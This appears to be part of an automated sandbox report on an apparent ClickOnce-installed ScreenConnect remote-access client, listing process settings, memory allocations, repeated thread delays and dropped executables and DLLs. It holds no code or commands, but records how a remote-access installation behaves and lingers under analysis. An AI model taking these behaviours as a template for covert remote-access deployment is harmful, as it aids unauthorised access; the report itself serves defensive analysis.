                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1674C7F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 16765F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 1310000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 31B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 2FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 1800000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 19F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 39F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: CE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1A710000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599394Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598293Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597939Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597800Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597311Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596210Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595917Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595806Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595666Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593361Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593182Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592577Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3256Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6377Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
